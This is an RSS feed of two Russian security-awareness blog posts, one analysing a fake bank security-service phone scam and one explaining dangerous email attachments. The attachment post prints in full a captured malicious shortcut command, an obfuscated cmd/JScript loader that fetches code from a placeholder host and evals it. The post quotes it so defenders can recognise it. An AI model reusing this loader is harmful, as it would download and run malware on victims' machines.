<?xml version="1.0" encoding="utf-8"?> 
<rss version="2.0"
  xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
  xmlns:atom="http://www.w3.org/2005/Atom">

<channel>

<title>Блог Start X: заметки с тегом социальная инженерия</title>
<link>https://blog.startx.team/tags/socialnaya-inzheneriya/</link>
<description>как поведение людей влияет на безопасность Наши продукты • Дайджесты • Статьи • Список постов</description>
<author>Start X</author>
<language>ru</language>
<generator>E2 (v3820; Aegea)</generator>

<itunes:owner>
<itunes:name>Start X</itunes:name>
<itunes:email></itunes:email>
</itunes:owner>
<itunes:subtitle>как поведение людей влияет на безопасность Наши продукты • Дайджесты • Статьи • Список постов</itunes:subtitle>
<itunes:image href="" />
<itunes:explicit></itunes:explicit>

<item>
<title>Антифишинг-разбор: звонок из «службы безопасности банка»</title>
<guid isPermaLink="false">134</guid>
<link>https://blog.startx.team/all/reveal-scam-caller/</link>
<pubDate>Tue, 06 Aug 2019 23:30:30 +0300</pubDate>
<author>Start X</author>
<comments>https://blog.startx.team/all/reveal-scam-caller/</comments>
<description>
&lt;p main&gt;
    &lt;i&gt;Мошенники придумывают всё новые способы обмануть людей. Вместе с психологом мы разбираем, почему эти способы бывают успешны и что делать, чтобы не стать жертвой.&lt;/i&gt;
&lt;/p&gt;
&lt;p aside style="opacity: 1; text-align: center;"&gt;
    &lt;img src="/pictures/andrey2.jpg" width="40%" /&gt; &lt;br /&gt;
    &lt;a href="mailto:digest@antiphish.ru"&gt;Андрей Жаркевич&lt;/a&gt;&lt;br /&gt; редактор&lt;br /&gt;&lt;br /&gt;
&lt;img src="https://blog.antiphish.ru/pictures/olga.jpg" width="40%"/&gt; &lt;br /&gt;
&lt;a href="mailto:psy@antiphish.ru"&gt;Ольга Лимонова&lt;/a&gt;&lt;br /&gt;психолог&lt;br /&gt;&lt;br /&gt;
&lt;/p&gt;
&lt;p&gt;Один из массовых и популярных в последнее время способов — звонок из «службы безопасности банка».&lt;/p&gt;
&lt;h2&gt;Пример №1&lt;/h2&gt;
&lt;p&gt;Вариант такой атаки — с подделкой исходящего номера, когда у жертвы на телефоне высвечивается настоящий номер банка:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://blog.antiphish.ru/pictures/IMG_0463-2.jpeg" width="60%"&gt;&lt;/p&gt;
&lt;p&gt;Послушайте, как разговаривают мошенники:&lt;/p&gt;
&lt;div class="e2-text-audio"&gt;
&lt;div class="e2-text-super-wrapper e2-jouele-wrapper"&gt;&lt;a class="jouele" data-space-control="true" data-length="368" href="https://blog.startx.team/audio/audio_2019-08-scammers.mp3"&gt;Разговор с мошенником&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;Пример №2&lt;/h2&gt;
&lt;p&gt;Таким же способом пытались обмануть Андрея Золотова, который не только не поддался на обман, но и рассказал эту историю на своей странице а соцсети.&lt;/p&gt;
&lt;!-- ((https://www.facebook.com/story.php?story_fbid=10217129344538484&amp;id=1615504620 --&gt;&lt;p&gt;рассказал эту историю на своей Facebook-странице)):&lt;/p&gt;
&lt;!--
&lt;iframe src="https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fandrew.zolotov%2Fposts%2F10217129344538484&amp;width=500" width="500" height="546" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true" allow="encrypted-media"&gt;&lt;/iframe&gt;
--&gt;&lt;h2&gt;Разбор&lt;/h2&gt;
&lt;p&gt;Мы разобрали атаку мошенников по стадиям воздействия &lt;a href="https://www.antiphish.ru/stages"&gt;в соответствии с психологической моделью&lt;/a&gt;, которая разработана и используется специалистами Антифишинга:&lt;/p&gt;
&lt;div class="e2-text-picture"&gt;
&lt;img src="https://blog.startx.team/pictures/af-attack-stages.png" width="857" height="380" alt="" /&gt;
&lt;/div&gt;
&lt;p&gt;Ниже — детальные результаты:&lt;/p&gt;
&lt;h2&gt;1. Внешний вид&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Узнаваемый авторитетный бренд, правдоподобное оформление: Номер телефона мошенников маскируется под настоящий. Во втором эпизоде у жертвы он был сохранен в записной книжке как «Поддержка ВТБ». Представляются службой безопасности банка. Используют классические шаблонные фразы сотрудников банка.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Личное обращение: Персональное&lt;/b&gt; — «Золотов Андрей Васильевич», знают дату рождения.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Атрибуция: Личная&lt;/b&gt; — Жертва является клиентом банка.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;2. Эмоциональное воздействие&lt;/h2&gt;
&lt;p&gt;Вызываемые эмоции:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Страх&lt;/b&gt;: «Вы сейчас переводили 42 тысячи Кузнецовой Марии в Самарскую область?», «Вам нужно заблокировать и перевыпустить все карты, сменить компьютер. В личный кабинет сейчас не заходите, доступ к нему мы тоже заблокировали в целях безопасности»,&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Радость/Благодарность&lt;/b&gt;: «Так как платеж был помечен, как сомнительный, он заморожен».&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Усилители:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Авторитет&lt;/b&gt;: звонок от службы безопасности крупного банка&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Срочность&lt;/b&gt; — платеж заморожен только на 10 минут.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Ситуация-катастрофа&lt;/b&gt;: «Злоумышленники получили доступ к вашему интернет-банку и сейчас пытаются оттуда вывести деньги!»&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;3. Личностные черты и опыт пользователя&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Личностные черты&lt;/b&gt;: Нельзя определить точно. Можно лишь отметить, что бдительность автора была усыплена? и он был достаточно доброжелателен в беседе, лишь под конец проявив подозрительность. Следование исключительно собственным правилам, вне зависимости от ситуации.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Актуальная потребность: Безопасность&lt;/b&gt;. Ею пытаются манипулировать сначала со стороны заботы (наиболее оптимальная тактика), затем используя уговаривание, а далее и вовсе угрозы.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Демографические характеристики: Взрослый мужчина, программист&lt;/b&gt; — не лучшая аудитория среди жертв.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Опыт столкновения с цифровыми атаками&lt;/b&gt;: Технически подкован и знаком с основами информационной безопасности&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;4. Активация внимания и мышления&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Генерализация гипотезы&lt;/b&gt;: Возможно это мошенники?&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Проверка гипотезы&lt;/b&gt;: Для этого стоит перезвонить в банк самому, прежде чем куда либо вводить код&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Оценка рисков&lt;/b&gt;: Перезвонить — затрата меньше чем в одну минуту. Передача данных мошенникам — потери в денежном эквиваленте.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Глобальная оценка&lt;/b&gt;: Не стоит вестись на угрозы и срочность, лучше самому перезвонить в банк.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;5. Реакция&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Звонок на официальный номер банка с уточнением ситуации&lt;/li&gt;
&lt;li&gt;Зафиксировали, с какого ip действовал мошенник, и составили заявку в службу безопасности банка&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Чем хороши мошенники?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Первичная манипуляция действиями: «проверьте свои карты — все ли они на месте». Если человек выполнил действие по указке раз, то шанс, что выполнит повторно, повышается.&lt;/li&gt;
&lt;li&gt;Выстраивание отношения/транзакции «Родитель» (управляющий мошенник) — «Ребенок» (подчиняющаяся, следующая указам жертва).&lt;/li&gt;
&lt;li&gt;Маскировка под официальный телефонный номер&lt;/li&gt;
&lt;li&gt;Использование классических шаблонных фраз сотрудников банка&lt;/li&gt;
&lt;li&gt;Ввод кода в тоновом режиме, а не голосом оператору. Это вызывает меньше подозрений, поскольку практически не используется.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Чем выдали себя мошенники?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Срочность&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Техническая неграмотность&lt;/b&gt;. Устрашение «покупкой нового компьютера» — это ориентировано на пенсионеров, которые слабо ориентируются в технической среде и действительно готовы поверить и испугаться денежных затрат.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Путаница в словах&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Эмоциональная реакция&lt;/b&gt; самого мошенника, проступающая на вербальном уровне&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="margin-top: 2em; padding: 2em; background-color: cornsilk; width: 80%; margin-bottom: 1em;" class="wrapper"&gt;&lt;div class="castom-wrapper"&gt;&lt;div class="castom-img"&gt;&lt;p&gt;&lt;a href="https://www.antiphish.ru/"&gt;&lt;br /&gt;
&lt;img src="https://blog.antiphish.ru/pictures/af-logo-blue-200.png" class="ico-antph"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;&lt;div class="castom-text"&gt;&lt;p&gt;&lt;b&gt;О компании «&lt;a href="https://www.antiphish.ru/"&gt;Антифишинг&lt;/a&gt;»&lt;/b&gt;&lt;br /&gt;
&lt;br&gt;Наша платформа помогает обучить сотрудников, измерять и тренировать их навыки с помощью имитированных атак. Ведём исследования, используем собственную методологию, создаем реалистичные сценарии и актуальные примеры мошенничества для тренировки навыков.&lt;/p&gt;
&lt;p&gt;
      Заполните &lt;a href="https://www.antiphish.ru/"&gt;форму на сайте&lt;/a&gt; или &lt;a href="mailto:ask@antiphish.ru"&gt;напишите нам&lt;/a&gt;, чтобы обучить и проверить своих сотрудников.&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;link href="//cdn-images.mailchimp.com/embedcode/classic-10_7.css" rel="stylesheet" type="text/css"&gt;
&lt;div style="padding: 2em; border: 2px solid #1996D4; width: 80%;" class="wrapper"&gt;
  &lt;b&gt;
    &lt;a href="tg://resolve/?domain=antph"&gt;Телеграм-канал Антифишинга&lt;/a&gt;
    &lt;br&gt;
  &lt;/b&gt;
  &lt;div class="castom-wrapper"&gt;
    &lt;div class="castom-img"&gt;
      &lt;a href="tg://resolve/?domain=antph"&gt;
        &lt;img src="https://blog.antiphish.ru/pictures/iconfinder_social-56_1591869.png" style="max-width: 100%;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="castom-text"&gt;
      &lt;span&gt;Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.&lt;/span&gt;
      &lt;br&gt;&lt;br&gt;
      &lt;span&gt;Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.
      &lt;/span&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;div style="padding: 2em; border: 2px solid #4CAF50; width: 80%;" class="wrapper"&gt;
  &lt;b&gt;Оставайтесь в безопасности&lt;/b&gt;
  &lt;p&gt;Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.&lt;/p&gt;
&lt;div id="mc_embed_signup"&gt;&lt;p&gt;&lt;form action="https://antiphish.us12.list-manage.com/subscribe/post?u=5bc2379b1c3f318ccd3523105&amp;amp;id=9663ee2d1b" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate="" style="padding: 0px;"&gt;&lt;/p&gt;
&lt;div id="mc_embed_signup_scroll"&gt;&lt;div class="mc-field-group"&gt;&lt;p&gt;&lt;label for="mce-EMAIL"&gt;Эл. почта: &lt;/label&gt;&lt;br /&gt;
&lt;input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL"&gt;&lt;/p&gt;
&lt;/div&gt;&lt;div id="mce-responses" class="clear"&gt;&lt;div class="response" id="mce-error-response" style="display:none"&gt;&lt;/div&gt;&lt;div class="response" id="mce-success-response" style="display:none"&gt;&lt;/div&gt;&lt;/div&gt;&lt;!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups--&gt;&lt;div style="position: absolute; left: -5000px;" aria-hidden="true"&gt;&lt;p&gt;&lt;input type="text" name="b_5bc2379b1c3f318ccd3523105_9663ee2d1b" tabindex="-1" value=""&gt;&lt;/p&gt;
&lt;/div&gt;&lt;div class="clear"&gt;&lt;p&gt;&lt;input type="submit" value="Подписаться" name="subscribe" id="mc-embedded-subscribe" class="button"&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;/form&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;script type="text/javascript" src="https://vk.com/js/api/openapi.js?162"&gt;&lt;/script&gt;
&lt;!-- VK Widget --&gt;&lt;div id="vk_groups" class="vk_groups" style="overflow:hidden"&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;
  VK.Widgets.Group("vk_groups", { mode: 1, width: "400", overflow: "hidden" }, 185030667);
&lt;/script&gt;
</description>
</item>

<item>
<title>Опасные вложения</title>
<guid isPermaLink="false">3</guid>
<link>https://blog.startx.team/all/malware-attached/</link>
<pubDate>Mon, 12 Sep 2016 01:57:03 +0300</pubDate>
<author>Start X</author>
<comments>https://blog.startx.team/all/malware-attached/</comments>
<description>
&lt;p main&gt;
&lt;i&gt;Опытные пользователи знают, что через почту им могут прислать вирус или троянскую программу. Мошенники, в свою очередь, стараются сделать так, чтобы вредоносные вложения выглядели как можно более безобидно.&lt;/i&gt;
&lt;br&gt;&lt;br&gt;
В статье мы покажем примеры опасных вложений и объясним, на что стоит обращать внимание, чтобы не стать жертвой. Статья будет полезна пользователям и системным администраторам. &lt;/p&gt;
&lt;p aside style="opacity: 1; text-align: center;"&gt;
&lt;img src="/pictures/svoldokhin_new.jpg" width="40%"/&gt; &lt;br /&gt;
Сергей Волдохин &lt;br /&gt;
&lt;a href="mailto:sv@antiphish.ru"&gt;sv@antiphish.ru&lt;/a&gt;
&lt;/p&gt;
&lt;h2&gt;«Традиционный» вредоносный файл&lt;/h2&gt;
&lt;p&gt;Вирус или троянскую программу пользователи обычно представляют как исполняемый файл с расширением .ехе под Виндовс или .dmg под Мак.&lt;/p&gt;
&lt;p&gt;Такая вредоносная программа, приложенная к письму, может не определяться антивирусом, но почти все почтовые серверы умеют фильтровать подобные вложения: письмо с .ехе-файлом просто не будет отправлено. Чтобы обойти это ограничение, мошенникам бывает достаточно упаковать исполняемый файл в архив:&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/wurde.JPG" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/jack-exe.PNG" /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Что делать пользователю:&lt;/b&gt; получив любое вложение в архиве, распакуйте его в отдельную папку и проверьте тип вложенного файла. Не открывайте файлы типа &lt;i&gt;Приложение&lt;/i&gt;, даже если ваш антивирус не против.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору.&lt;/b&gt; Постарайтесь ограничить прием почты с исполняемыми файлами, даже если они упакованы в архив. При настройке ограничений стоит ориентироваться на &lt;a href="https://en.wikipedia.org/wiki/Portable_Executable"&gt;формат файла&lt;/a&gt;, а не его расширение.&lt;/p&gt;
&lt;h2&gt;Вредоносный скрипт&lt;/h2&gt;
&lt;p&gt;Кроме традиционных программ, операционная система Виндоус умеет выполнять так называемые скрипты — программы, написанные на специальном языке программирования, например JScript или WBScript.&lt;/p&gt;
&lt;p&gt;У таких языков есть ряд ограничений, но написанная на них вредоносная программа вполне способна зашифровать все файлы на диске или скачать полноценного троянца.&lt;/p&gt;
&lt;p&gt;О существовании скриптов знает еще меньше пользователей, а мошенники стараются скрыть настоящий тип файла: например, через длинное или вызывающее доверие название:&lt;br /&gt;
&lt;img src="/pictures/meeting-wsf.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/scan-js.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/sct.PNG" /&gt;&lt;br /&gt;
&lt;i&gt;&lt;a href="https://twitter.com/subtee/status/771356649449586690"&gt;Источник&lt;/a&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Пользователю:&lt;/b&gt; Не открывайте файл, тип которого содержит слова «скрипт», «сценарий» или что-то непонятное. И даже если ваш антивирус не имеет ничего против.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору:&lt;/b&gt; постарайтесь заблокировать исполнение скриптов, или хотя бы переопределить их обработчики. Файл .js, для которого обработчиком назначен notepad.exe — неплохая помощь антивирусу и защита для невнимательных пользователей.&lt;/p&gt;
&lt;h2&gt;Офисный документ&lt;/h2&gt;
&lt;p&gt;Пользователям бывает сложно поверить, но файлы Ворд или Эксель тоже могут быть вредоносными. Наиболее популярная схема — вредоносная программа запускается через макрос, который пользователю предлагается разрешить к выполнению под разумным предлогом. Например, если содержимое документа некорректно отображается:&lt;/p&gt;
&lt;p&gt;&lt;img src="/pictures/locky-macros-6401.png" /&gt;&lt;br /&gt;
&lt;i&gt;&lt;a href="https://www.anti-malware.ru/news/2016-02-25/18144"&gt;Источник&lt;/a&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Пользователю:&lt;/b&gt; не разрешайте выполнение макросов в документах, которые вам присылают по электронной почте. Особенно если не знаете отправителя и не уверены в содержании макроса.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору:&lt;/b&gt; по возможности отключите исполнение макросов на компьютерах пользователей. Те, кому это действительно необходимо для работы, дадут вам знать.  Вовремя обновляйте все офисные программы — кроме макросов, вредоносная программа может выполниться через эксплойт к одной из многих &lt;a href="https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-320/Microsoft-Office.html"&gt;публичных RCE-уязвимостей&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Опасный ярлык&lt;/h2&gt;
&lt;p&gt;Иногда во вложении вовсе может не быть вредоносной программы. Вместо нее мошенники присылают ярлык, перейдя по которому пользователь сам загрузит и запустит вредоносную программу:&lt;/p&gt;
&lt;p&gt;&lt;img src="/pictures/schet.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/attached.PNG" width="100%" /&gt;&lt;br /&gt;&lt;br /&gt;
&lt;img src="/pictures/link-properties.PNG" /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;В свойствах этого ярлыка прописана команда, которая загрузит и запустит вредоносный .js-скрипт из интернета. Все, что нужно для загрузки и запуска, уже содержится в операционной системе.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Пользователю:&lt;/b&gt; ярлыки, которым вы можете доверять, находятся на вашем рабочем столе. Не стоит запускать файл с типом &lt;i&gt;Ярлык&lt;/i&gt;, который вам прислали по электронной почте. Даже если его название вызывает доверие.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору:&lt;/b&gt; постарайтесь заблокировать исполнение любого командного интрпретатора под учетной записью пользователя. По возможности переопределите его имя и путь — вредоносным программам будет сложнее сориентироваться. Обратите внимание на полное содержимое вредоносного ярлыка:&lt;/p&gt;
&lt;pre class="e2-text-code"&gt;&lt;code class=""&gt;%windir%\system32\cmd.exe /c REM.&amp;gt;3.txt&amp;amp;echo var ty= new ActiveXObject(&amp;quot;Msxml2.ServerXMLHTTP.6.0&amp;quot;);ty[&amp;quot;\x6F\x70\x65\x6E&amp;quot;](&amp;quot;\x47\x45\x54&amp;quot;,&amp;quot;http://&amp;lt;url&amp;gt;.com/src/gate.php?a&amp;quot;);ty[&amp;quot;\x73\x65\x6E\x64&amp;quot;]();eval(ty[&amp;quot;responseText&amp;quot;]);&amp;gt;3.txt&amp;amp;ren 3.txt 3.js&amp;amp;3.js&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Вредоносная ссылка&lt;/h2&gt;
&lt;p&gt;Иногда мошенники не рискуют высылать вложенный файл, а вместо этого добавляют в письмо вредоносную ссылку. Благодаря оформлению, такая ссылка выглядит похожей на «безопасный» вложенный файл:&lt;/p&gt;
&lt;p&gt;&lt;img alt="" src="/pictures/zakaz.PNG" style="border: 1px solid gray;" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="" src="/pictures/url.png" /&gt;&lt;/p&gt;
&lt;p&gt;Обе ссылки около «заявки» ведут на вредоносный файл.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Пользователю:&lt;/b&gt; умейте отличать вложенный файл от ссылки, которая ведет на внешний сайт. Наведите курсор и посмотрите, куда на самом деле ведет «ссылка на документ».&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Администратору:&lt;/b&gt; постарайтесь ограничить загрузку исполняемых файлов на прокси-сервере. Аналогично вложениям, ориентируйтесь на тип файла, а не расширение.&lt;/p&gt;
&lt;h2&gt;Выводы&lt;/h2&gt;
&lt;ol start="1"&gt;
&lt;li&gt;Мошенники используют самые разные форматы вредоносных вложений.&lt;/li&gt;
&lt;li&gt;Не открывайте никакие вложения и не переходите по ссылкам, в которых не уверены.&lt;/li&gt;
&lt;li&gt;По возможности ограничьте запуск скриптов, командных интерпретаторов и загрузку небезопасных типов файлов.&lt;/li&gt;
&lt;li&gt;Обучайте своих пользователей основам информационной безопасности. Для начала можно переслать ссылку на эту статью.&lt;/li&gt;
&lt;li&gt;Тренируйте и контролируйте практические навыки противодействия фишингу.&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="padding: 1em; background-color: cornsilk; width: 80%; margin-bottom: 1em;"&gt;&lt;p&gt;&lt;b&gt;О компании «Антифишинг»&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Мы помогаем обучить сотрудников и контролируем их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и актуальные примеры мошеннических писем — в том числе те, которые описаны в статье.&lt;/p&gt;
&lt;p&gt;Чтобы проверить своих пользователей, отправьте запрос через &lt;a href="http://www.antiphish.ru"&gt;наш сайт&lt;/a&gt; или напишите нам: &lt;a href="mailto:ask@antiphish.ru"&gt;ask@antiphish.ru&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</description>
</item>


</channel>
</rss>